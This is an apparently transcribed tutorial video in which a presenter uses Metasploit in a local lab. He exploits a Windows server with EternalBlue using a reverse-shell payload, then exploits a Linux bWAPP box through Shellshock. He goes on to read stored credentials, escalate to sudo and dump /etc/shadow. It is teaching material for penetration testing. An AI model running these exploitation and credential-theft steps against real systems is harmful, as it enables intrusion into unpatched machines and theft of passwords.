- And then we got the WIN. So we like WIN, 'cause guess what that means. We successfully attacked the system. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt, and that's because that's exactly what it is. So if I do, like, whoami, I get NT AUTHORITY\SYSTEM. I have full control over this machine. I am the administrator, and it was a point-and-click thing. And that's the power of Metasploit. If there is something like this that's out there, I don't have to do the hard work, 'cause I've done EternalBlue attacks manually. That is a lot of work. Then cat settings.php. Oh look, credentials. Now I go, okay, so what can I do? Can I kind of work with that? Can I su to bee? And it asks for... okay, bug. Oh, look, I've just elevated my privileges. Now I'm the bee user, so if I do id or whoami, it tells me I'm bee. I'm no longer www-data. If I do sudo -l to list my sudo privileges, I put in bug, that's my password. It tells me I have full sudo privileges here. So now I can sudo cat /etc/shadow, and there's all the password hashes. That's protected, and only administrative users can look at this. I have that capability. I have full control over this machine at this point.

(upbeat music)

- Everyone, David Bombal back with Daniel from ITProTV. I really wanna thank ITProTV for sponsoring this video series. In a previous video, which I've linked here and below, Daniel showed us how to do a SQL injection. Daniel, what are you gonna show us this time?

- Well, today we're gonna
have a little bit of fun with my favorite, closest thing that you're probably gonna get to a 'point and click' hacking tool, which is known as the Metasploit Framework. Now, don't get this confused with Metasploit Pro, that's a pay-for-money kind of thing. Metasploit Framework is free for anybody to go and download and work with and play with. A framework, and what that means is, like, we have all sorts of great exploits in here. You just have to point it at the right target, give it the right options, and if everything goes to plan, you should be hacking away and having access to something very, very shortly. So Metasploit Framework, yeah, we'll shorten that down to Metasploit, and that's what we're gonna look at today.

- That's great. I mean, this is like covering your favorite tools. So, this is one of your favorite tools because?

- It's one of my favorite tools because time is of the essence a lot of times, and sometimes you don't wanna spend all the time that it takes to hack something manually. You've done it. You know, like, "Oh yeah, I've seen this before. I just have to do X, Y, and Z," but X, Y and Z can take up a bit of time. Probably there's a Metasploit module for that, which means that there is an exploit built into Metasploit that all you have to do is look for it and use it, and fire and forget. And then it was easy. It took you much less time. So it's a big time saver, plus it has a lot of different functionality wrapped around it that you end up using in different ways. There's scanners that are available inside of it. So if you're looking to scan certain types of things, you can kind of jump in there and play with that. But if you're just looking for, "I just wanna hack something, I know this is a well-known vulnerability, I've found a website or a server or something on the internet that contains that vulnerability," just fire up Metasploit, give it the options, and fire and forget, and you should be having some access. So I liked that aspect of it. Saved me some time, let me work on things that are actually making me scratch my head and making me go, "Hmm, I feel like there's a way into this and I just don't see it quite yet," or "I think it's like this," and you're having to play with options. There's a lot of manual stuff that can go into your day when you're working through, if you're doing like a CTF, or if you're on a pen test itself. Especially if you're doing a pen testing engagement, you don't want to spend all your time manually hacking things that you know you can do but take a lot of time. Just let Metasploit do it for you. So I liked that part of it.

- That's great. I mean, in this video, you
gonna show us how to hack. Is it a Windows box? Is that right?

- Yeah. We're gonna have two boxes today. I'm gonna go for a Windows box first, a Windows server, and the other one is going to be a Linux server. So we're just gonna show you how easy it can be. It'll take a little bit of set up. Again, like I said, there's some options. What do I mean by that? Information that we need to feed it, so it knows, like, "Oh, that's the IP address of the target you would like to hack at? Where am I coming back to? If I was maybe giving you a shell, how would that look?" So you've got to set a few options, but they're very descriptive and straightforward. So it shouldn't be too big of a lift for us.

- You know, I think we need to just state from the outset: you have downloaded VMs, you're running this locally. You're not attacking a remote device. This is a penetration lab or testing lab that you're running locally. Is that right?

- Yes, absolutely. I just spun up, I think, the VM for Windows. I was running, like, I had a 2008 R2 server ISO laying around. I said, "Okay, well, let's use that. That's an easy lift." And then the other one was another one of these hacking playgrounds called bWAPP, which is the broken web application something, something, I forget the... Actually, I'm not great with acronyms, but it's another one of those kind of prebuilt appliance-type VMs that has a broken web application, has a bunch of different vulnerabilities to it. And one of them is gonna be something we can exploit with Metasploit. So we'll go after that, that way.

- Yeah. I'll put links below for people to download some of the stuff, but Daniel, without further ado, let's show us how it's done, and then we'll get into the
weeds of what you actually did.

- All right. I've got an icon on my desktop, but if you wanna fire it up from the console itself, you can just type in msfconsole. That's mike-sierra-fox-console, all one word, lowercase, and it'll go. But I'm just gonna click my little icon that I've got in my taskbar there. And that's going to fire up, and if you're going, "Whoa, Daniel, that is super small," you're absolutely right. I'll make it a little bit bigger so we can all see it. I'm just gonna let it fire up for a second. What it's doing right now is just initializing the database of exploits and auxiliary options that it does have. And once it's done, it'll drop you to this little thing here, and I'll just make this look a little bit bigger. It's probably flashed the screen. It's a little weird, but there we go. And it always has some funny ASCII art at the onset there. So this is not normal. Like, it's not a part of the program, it's just for fun. The part of the program is right down here where it says msf5, that's what we wanna look at. So, what I'm gonna do is I'm
gonna try the tried-and-true, well-known, well-executed and well-adapted-to-crypto-ransomware goodness known as WannaCry, which was the EternalBlue exploit that was released. You know, it was found from the NSA and released a few years ago, and you think, "Oh man, that's kind of old." It's funny. There are still areas in the world which are using older versions of Windows because they are pirated versions and they can't update. So their infrastructure is still maintained on that, and they can't update it. So they're kind of stuck. What do they do? Well, they can get hacked if they leave it up on, attached to the internet. So it's still a viable thing. It's something that we still see in the real world, in the live world, today. So don't discount old EternalBlue, it's still running around. So to find it, I just do a search: type in the word search, get my mouse out of the way, and type in what I'm looking for. So in this case, it's eternalblue. And then that will return back anything that it defines as related to eternalblue, that it can think of based off of your search term. So you can get a little crafty with that if you need to, if you're looking for something specific. Sometimes not everything comes out very easy, but this one does. And I have a few options. You'll notice I have the matching modules. And then this shows me numbers. It starts counting at zero. So number zero will be this one, and then it has a description right over here, MS17-010. And it tells me it's EternalRomance, EternalSynergy, EternalChampion. These were the original names for eternalblue before it kind of landed on that. So they're all kind of doing the same thing, just in vaguely different ways. But it also has this: auxiliary/scanner/smb for MS17-010. That tells me that it does a detection check for EternalBlue. Okay, well, let's start there. Let's do a scan and check for that vulnerability against our machine. So if I do use and I give it the number, so I don't even have to, like, copy and paste this. Normally you can just copy and paste that in there, or you can type it in, but now they've updated it. You can just use the number. So that's even easier, right? So I can just say use 1. Bam. You'll notice my prompt has changed. It's a little bit small and I'll give you a little
more real estate there. Plus, there we go. I can make sure you guys can see all this. There we go. And now I have jumped down into that scanner for that. So all I can do now is check what options it needs. So I'll just type in options, and here are the options. So because I've got to kind of blow it up a little big, it's kind of word-wrapped and doing some funky stuff, but I'll walk you through this. So we've got "check for the architecture." That setting is set to true, it tells me whether or not it's required, and then gives me a description of what that does: checks for architecture on vulnerable hosts. Okay, great. So this is something it will check for even though it's not a required thing, that's just a default, right? So you can kind of walk through this. What's important for us right now, well, usually the main thing you need to do is tell it what's the target. And typically that is through this option right here, RHOSTS or RHOST. Those are the two main ways in which you usually see that vetted out. So if you see RHOSTS or RHOST, it's asking what is the remote host in which you wish to attack. And you can see that's right over here: the target host or hosts, and you can put the range or the CIDR identifier and also the good stuff, right? I think that's all I need here. It's already got the port set, which is the right one, which is 445. So I just set that. So set rhosts, and that will be the IP of my server, which is .21. There we go. Set that--

- [David] Your Windows server, yeah?

- Yeah, this is my Windows server. I can check the options again to make sure that that went through, and we can see now that has changed to the IP of that server. At that point, you can type one of two things. If you want to be super elite, you type exploit. So I wanna be super elite, (David laughs) so I'm gonna type exploit. There we go. And we see that it comes back very quickly. The host is likely vulnerable to MS17-010, and then it even gives me that it is a Windows Server 2008 R2. Sweet. So we've got good information. Now all we have to do is gain that access, right? So I'm gonna search again for eternalblue. I can't type,
(Daniel chuckles) blue, there we go. And then I do have some options. I have some different options. Some may work, some may not work. This is sometimes where it can be a bit of a trial and error thing. So you might just... Good news is there's not many options for us here, so it wouldn't take as much time to kind of walk through each one of these if we were kind of playing a guessing game. One of them, right out of the gate, tells me this is for Windows 8, right? Well, I'm not attacking a Windows 8 box. So I can go ahead and disregard that. But what's another one that we have here? We've got this one, it's an exploit. And you'll notice that they start with "exploit," right? Exploit for windows/smb, and then it gives the Microsoft equivalent of a CVE for the actual vulnerability for their system. It even tells you, like, whether or not it works very well. This is average, but for us this is gonna be the one we want. Right? So the good news is, out of the gate it was the first one that we needed. So I'm gonna do use 2. So use 2, 'cause that's the one we want. Our prompt has changed, and we need to go in here and check those options. Now that we've got those options up, you'll see that there's RHOSTS right there. So obviously that's something we need to give it. It did also kind of tell us right here, "no payload is configured." The payload is, once I attack this thing, I can make it do whatever I want. What is it that you want me to make it do? So it's saying nothing is configured and it's defaulting to this payload, which is a reverse shell. So send me back a command prompt so that I can control the machine. I don't wanna use Meterpreter, so I'm gonna change it so that you can see that and kind of get some more information on how to use this, but it's a pretty simple thing to do. All right. So let's start setting some stuff, and you'll notice that down here, the exploit target information is there as well. It tells me Windows 7 and Windows Server 2008 R2 (x64). Hey, isn't that the one we just found? It is. (David laughs) Like it was planned, right? So let's see here. Let's set that rhosts. rhosts, it used to be that case sensitivity was a thing, but now it's not. Or I think it was, but now it's not. So you don't have to worry about that. And that is 10.10.10.21, all set. Good to go. What else do we need to set here? As far as the target goes, I think that is it. Now we need to set that payload. So I wanna change that payload. So I'm gonna say set payload, and I wanna set it to something I want. Well, I know this is a Windows thing. If you're like, "Oh, you know what? What payloads are available?" you can kind of do, like, a list payloads and they'll show you the ones that you can, oh, I'm sorry. I think it's show payloads. Do a show payloads. There's a lot of payloads you can give it. So I'm not gonna bog us down with that. I already know the one I want. So windows/x64/shell_reverse_tcp. There we go. It didn't complain. So I must've chosen something that actually worked for this. Go back to options, and we can see now this has been set under the payload. Now all I have to do is set the LHOST, which is the listening host. This is gonna be my attacking server, so that it knows where to send that information to and what port to go on. So I'm gonna change the host and the port, because the Windows box doesn't know what 127.0.0.1 is other than itself. So that's not gonna work. So we need to set lhost, which will be my box, it's just 10.10.10.10. And then I like to set my port. So lport to be something that's probably gonna bypass any kind of firewalling that might be there. So 443 is a great one, because, you know, a lot of times firewalls allow port 443. So if there was any firewall blocking on something like 4444, I wouldn't have an issue with this. I would still get my shell. At this point, we are ready
to Script Kiddie it up and type the word exploits. Right? (David laughs) Let's do that, exploits all day long. All right. So this is all information wrapped around what it's doing. It's trying to just let you know whether or not it's being successful, what's happening and what it's trying to do at that point in time. A lot of interesting things going on here. I do like how it says the overwrite completed successfully, that makes me feel good about this attack. I have seen this kind of, like, I'd have to do it over and over and over again. It didn't just work the first time. I had to be a little persistent. It will try to re-attack, attack, attack over and over again. So sometimes that's the case. We are also working in virtualization. So when you're throwing attacks like this at machines, it can start to break things, right? Because it's not really, you know, machines aren't designed to be attacked. They're designed to work normally. So if it's messed up... So you can see this, like, failed right out of the gate. Right? But that's okay, 'cause it's trying again. It's gonna try something else and see, "Well, maybe if we try a little move in here." Oh, look at that. And then we got the WIN. So we like WIN, 'cause guess what that means? We've successfully attacked the system we're going after, okay?

- [David] What do I do now?

- It says we won. What do we do? I'm gonna hit enter. Oh, there we go. Sometimes that happens. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt. And that's because that's exactly what it is. So if I do, like, whoami, I get NT AUTHORITY\SYSTEM. I have full control over this machine. I am the administrator. And it was a 'point and click' thing, I mean, hopefully it was pretty easy, at least as far as what you guys saw on the other end. And that's the power of Metasploit. If there is something like this that's out there, I don't have to do the hard work, 'cause I've done EternalBlue attacks manually. That is a lot of work. I actually ended up writing my own EternalBlue attack script, because I was like, "Man, I'm never gonna remember how to do all these things. I'll have to create a workflow. So lemme just create a script that does it all for me." And then it was like, "Oh no, dog. You just got to go over to--" (chuckles) "So use Metasploit. It's got the module." Oh, that's right, Metasploit, it's there. So it makes your life a whole lot easier for getting those low-hanging fruits without spending a lot of time and effort on it. So there's a Windows machine with a system-level
problem that it has. And we exploited that.

- You have admin access.

- Full admin access.

- You could load something on there so you could get back to this later, but it was re--

- Oh yeah, I could upload malware here. I could create a backdoor user, create a PowerShell script that does X, Y, or Z. I'm in full control at this point of this machine. I can turn on, like, if it didn't have RDP enabled, I could turn on RDP, create a user that's an admin user, and then log in using RDP and have my full Windows graphical loveliness, all I want. Then I can do post-exploitation things like grabbing password hashes and cracking them so that I have other people's passwords. And maybe I can use those passwords to gain access to other machines that don't have this. So it's a great stepping stone. So once you find some easy access such as this, it's just now that the tumblers are gonna start to fall, and I'm starting to work my way through the network at large instead of just the one machine.

- So, I mean, basically what you did is you used Metasploit. That's just something that you can download. And then,

- You're right.

- And all you did is you just followed some prompts, you entered some very basic information, IP address, I can't remember what else. It wasn't very much. (chuckles)

- It wasn't very much.

- You basically just told it which attack to launch. And I just wanted to emphasize this. If you hadn't used this, it would have been a lot of work, like you said, to be able to crack this. Is that right?

- Yeah, absolutely. Like I said, I've done it manually before, and that is not the way to fly. This is so much easier. Now, I have more control over those manual options. It's easier for me to make fine-tune adjustments or things of that nature to the stuff that I've done. But for the most part, these scripts work right out of the box. We had one failure, and then it went right away and said, "Oh yeah, we're good. I've got it. Here you go." And I just sat here and waited. That's all I had to do, was wait. I could have been running other scans and doing other things while this is hacking stuff for me. So that automation of doing things like that, making your workflow so much faster, grabbing low-hanging fruit, that it's not gonna take you forever so that you can start to, well, you probably will need to at that point, pivot into... I don't know, if they're using bad security like this, running old server systems that are unpatched, things of that nature, then yeah, they're kinda getting what they've got coming. It's probably not gonna be too easy to get through the rest of it either, but you do see that from time to time. Sometimes developers spin up machines like this so that they can start working on something because that's what they had available.

- I heard of a very big company
that got hacked recently that had some server, wasn't it that SolarWinds or something?

- Oh yeah, that's right. (David laughs) Now, to their defense, that was a 0-day, or a zero-day, exploit where some very smart people found a very esoteric flaw, built a tool that exploits that flaw, and exploited it. So, like, I don't wanna throw SolarWinds too hard under the bus on that. Like, there's no way they could have prepared for that. They just didn't know that it was a flaw. Somebody found it, exploited it. They just happened to be one of the biggest names in the industry and are hooked into some of the largest organizations, such as the United States Government and Military, which is what caused the problem.

- So, I mean, this worked because there was a vulnerability or an exploit in a Microsoft operating system that--

- Yeah.

- And this is, like you said, this is the reason why you wanna patch your systems, yeah?

- Exactly. This is why you wanna make sure you're doing the updates and patching that comes through. Have a good patching cycle. Can't tell you how many pen testers I've talked to. They're just like, "Man, if they just had had a scheduled patching cycle where they are applying patches in a systematic way, this never would have happened. We never would've gotten this far," or "That attack wouldn't have been successful," or such and such and such. Like, how many times I've heard that? I can't tell you. It's something as simple as just making sure that you are updating and patching your systems.

- So, I've heard Linux is secure. I mean, you're hacking Windows, but Linux can surely not be hacked.

- Yeah, I hacked. That's absolutely not true.
(David laughs) I hack it all the time. Again, I wanna kind of give you that look, so I'm gonna use an older thing, but if you're not updating, it will still be available to you. And I just wanted, again, more to showcase Metasploit than it was to show my elite hacking skills. It was more about, let's take a tour of Metasploit and how it works and what it can do. So it was cool. We can see what it does with Windows. Let's go after something completely different, like Linux. Right. So let's do that. I'm gonna get out of my shell here.

- [David] I mean, that's the point. I mean, this stuff happens all the time.

- [Daniel] Right.

- [David] You're just showing, like, a simple example for demonstration. Well, I mean, I shouldn't say simple. You're showing an example for demonstration purposes, but I mean, this stuff takes place all the time.

- Absolutely. And then this is just what I could think of immediately off the top of my head, so I can come in here again and do these demonstrations. There are other vulnerabilities that are much more current and recent that have Metasploit modules. So if I had that infrastructure set up, we would have been able to demo that. That would have just been a lot of lift, to, like, build an infrastructure that would allow for something like that. So I went with the easy button so that we can take a look at Metasploit and what it can do. So I've got another server, a Linux server, and this time I'm gonna search for shellshock. I don't know if you guys remember that one, but Shellshock was a horrible bug that plagued the Linux operating system and went undiscovered for many, many years. And once it was discovered, it was like, "Oh no, this is no good." Because it gave you access into people's systems and allowed you to, what's it called? Remote code execution. And I can execute code from a remote location. It would do those things, or commands. So that was bad. So my server, after I've done all my pregame, like my recon and things, I've found that it's running Apache, it's got a web server going. I found the cgi-bin area, which is where you're looking, if you're looking for Shellshock. And then I went to Metasploit and I found this one right here, which looked to fit my bill very nicely. Right? So it's going after Apache under the mod_cgi bash environment. Oh, everything (smooch), looking for that exactly. Now I did some testing. You can also find some testers, I think there's an auxiliary scanner. Yeah. So first, a specific one, DHCP clients. Oh, here's one for Apache, multi. So you could have scanned for it using this as well. I just did my own recon on that. And there we go. I know exactly where I want to attack this thing, so I know what options to set. Right? That's the options. So for this one, it's
going to be, let's see. Let's take a look at the options, and we're gonna use 5, that's right. use 5. Now look at those options. And we have a few, let's see here. Now we are gonna set a few more options than we did before, where, well, I had to set the host and then set that payload correctly. Right? But let's take a look. Some of the things that we do need, like the header that's gonna go out. These are the HTTP headers that you wanna use, as it says right there. And if you need to change that to, like, a POST method, but GET is the one we're gonna use. So that's fine, that's the default. I do need to change that. I'm not gonna use User-Agent. I wanna set that to the Referer header, which is where I found the vulnerability in this application. So I need to do that. Let's do that. We have set header, which will be Referer. So options again, just to make sure that's set. I'm super anal about making sure everything got set the way I wanted it to, because I have made typos in the past. And you're like, "Why isn't this working?" So typos can definitely kill your game really quickly. I don't know how many proxies. I do have an RHOST, though. Right? There it is right there. So let's set that. set rhosts, which is 10.10.10.17 for this server. All right. Show me those options. And let's see here, there it is. Set that, well, great. It's over port 80, so that's fine. I think that's all good. Our path, that's fine as well. Don't need any of this. It looks like our target. Oh, we got one more thing, TARGETURI. This is the actual path to the script that we're gonna exploit, that I have found using Burp Suite. And again, once we get to the Burp Suite, I'm sure you'll be like, "Man, he's got all this information. Where does he get it from?" Burp Suite. Right. So we'll have some fun with some Burp Suite coming up very shortly. Not today, but in another one. All right. So let's set that targeturi. So set targeturi, which, if I remember, is bWAPP, then cgi-bin/shellshock.sh. Okay, now that I've got this set, the last thing I have to do is set our payload, which is this person right here. Right? And I'll just stick with the default on that. We don't need to fiddle around with it. So set lhost of 10.10.10.10, which is my Kali server. That's the local host, or the listening host, right? With that, I'll leave the port. What the heck? I know that should be fine. And I will hit exploits, because it is time to exploits. Oh yes. The session has opened, right? 'Cause it says right there, Meterpreter 2 has opened. So this is using the built-in session management, shell management, that Metasploit has available. It's a very handy thing as well. Just depending on what you're attacking, you might wanna go with one or the other, but I can just type in shell. And then this is one channel created, id. Hey, look at that. hostname, like that. You do the same on the bee-box. If I wanna pretty this up, I
can throw some Python at it. Let's see here, import a nice pty shell of bash. So pty.spawn, and throw this in there, /bin/bash. Bam, bam. And now, oh, it didn't like it. You're right. Yeah. import pty. (chuckles) Okay. That's right. That was absolutely wrong. Lemme try that again, python -c import. Why am I doing that? import pty, and then there's what I'm looking for, pty.spawn. S-P-A-W-N. I'm the world's worst typist.

- [David] Don't worry. (Daniel chuckles)

- /bin/bash. There we go. Let's try that. And then you see, I get a nice, like, regular-looking Linux prompt. It's just one way to make that happen, but that's the one I typically use. But now I'm in the system, I can start doing things. Now ls, here's the files. I can do pwd, start looking for ways to elevate my privileges inside the machine. If anything shows itself, then great, I've grabbed the mountaintop. I start doing post-exploitation type of information grabbing: password hashes, doing the cracking thing on the back end, looking for pivoting, all of the good stuff. But as you saw, it wasn't that difficult. Throwing in some options.

- You got root on that device, did you?

- No, I'm actually logged in with the service account. As you can see, if I do id, I'm actually logged in with the service account of Apache, which is www-data.

- Oh yes, you were tackling an Apache script, is that right?

- That's exactly right. And since it was running with the permissions of that service account, that's the account we got when it ran the code to give me a shell back to Metasploit.

- But the point is, you managed to get a shell on a remote machine by exploiting a vulnerability in Apache or something.

- Yeah. And from here, you just, like I said, you start doing other stuff, right? So where are we? cgi-bin. Let's get out of there. Let's go to cd /var/www, take a look in there. And you'll notice we've got the bee-, cd bWAPP. And then here is the actual web application, all the PHP pages that make it up. I can start looking at things like, there's an admin folder. I wonder what's in that. Let's go there. cd /admin, ls. cd slash, oh, it's not slash admin. It's just admin. (chuckles) ls there. And I've got, like, a settings... what if I cat settings.php? Oh, look, credentials. Now I go, okay, so what can I do? Can I work with that? Can I su to bee? And it asks for... okay, bug. Oh, look, I've just elevated my privileges. Now I'm the bee user. So if I do id or whoami, it tells me I'm bee. I'm no longer www-data. If I do sudo -l to list my sudo privileges, I put in bug, that's my password. It tells me I have full sudo privileges here. So now I can sudo cat /etc/shadow. And there's all the password hashes. That's protected, and only administrative users can look at this. I have that capability. I have full control of this machine at this point.

- So yeah, you've just
shown us how to get root, or administrator, on Windows and root privileges on a Linux box.

- Yes. Well, at least one way.

- Yeah, one way. But I mean, it's really cool. I mean, it wasn't that difficult.

- No. If you know what to do, if you're familiar with these things, and you just start looking around, and you never know what you'll find.

- So, I mean, let's step back now and discuss what we've done.

- Yeah.

- So this is Metasploit, and this is an application that you just download from the internet, it's free. Yeah.

- Oh yeah. It's totally free. The Metasploit Framework. Metasploit Pro is some money, that costs a bit of the do-re-mi, but Metasploit Framework you should be able to just install. So if you're running something like Ubuntu or Mint or some other Red Hat or something like that, with Ubuntu and Debian variations it would be an apt-get way of installation. If you don't have it, you're running Kali, I think, pretty sure it comes pre-installed and you're off to the races. Just use msfconsole, and it fires it right up and you're ready to go.

- Yeah. So man, all you had to do was type that command, then you'd be at the point that you demonstrated. And then it's literally just tapping these few commands that you demonstrated.

- That's it. That's it.

- So it's not very difficult. So, I mean, I know Script Kiddie, that kind of thing is kind of frowned upon in the cybersecurity space, but tools like this, are they useful for professionals?

- Absolutely, they're useful for professionals. They're probably not using the free versions of these kinds of tools. They're probably using the professional versions of these kinds of tools, which have more functionality, more customability, right? So you can customize them, customizability, I guess, is the right word. You customize them in a way that works, and you can make them make changes a whole lot easier. Not that you can't customize this, you absolutely can. But if you're a professional, you will be going with the pro versions of these types of tools. So like Cobalt Strike and Metasploit, that's another one that's a really high professional-grade tool that's very similar to what we're seeing here, but has some graphical options to them as well. So does Metasploit Pro, it has a nice graphical option to mess around with. But if you do wanna play with some graphics, you want more of a GUI experience with Metasploit, you can use Armitage, which is free. It's kind of like a graphical front end that wraps around Metasploit, and it can be really useful. Plus it's really cool looking. I actually like using it because it gives you some pretty neat options, and you can point and click and stuff. So if you want that, just go with Armitage, get that installed. You're ready to go.

- That's great, Daniel. I mean, just give us a teaser. What other tools or things
are you gonna show us in upcoming videos?

- Yeah, you know, I'm sitting here looking at these password hashes and I'm thinking, "Hey, let's do some password cracking." That'd be a good one. That's something that is a good skill to have and understand and know and see how that works. So I typically revert to the easiest one available, which is John the Ripper, because it does a great job. There are others available, but John the Ripper would probably smoke at least a couple of these things. And maybe we can find some passwords. We can grab some Windows passwords, see if we can break those as well. And just see how John the Ripper works. We'll play around with that. Obviously we've been talking about Burp Suite. We'll have to do a (speaking in foreign language) of Burp Suite, (David laughs) kind of go through some of the more common options and things that you can do with Burp Suite and see why that is such a popular tool, because it is, and for good reason. So we'll do that as well.

- Yeah. I'm looking forward to it, Daniel. Thanks so much for sharing your knowledge with us, and big thanks to ITProTV for sponsoring this. But Daniel, thanks very much.

- Hey, no problem, man. Thanks for having me. (upbeat music)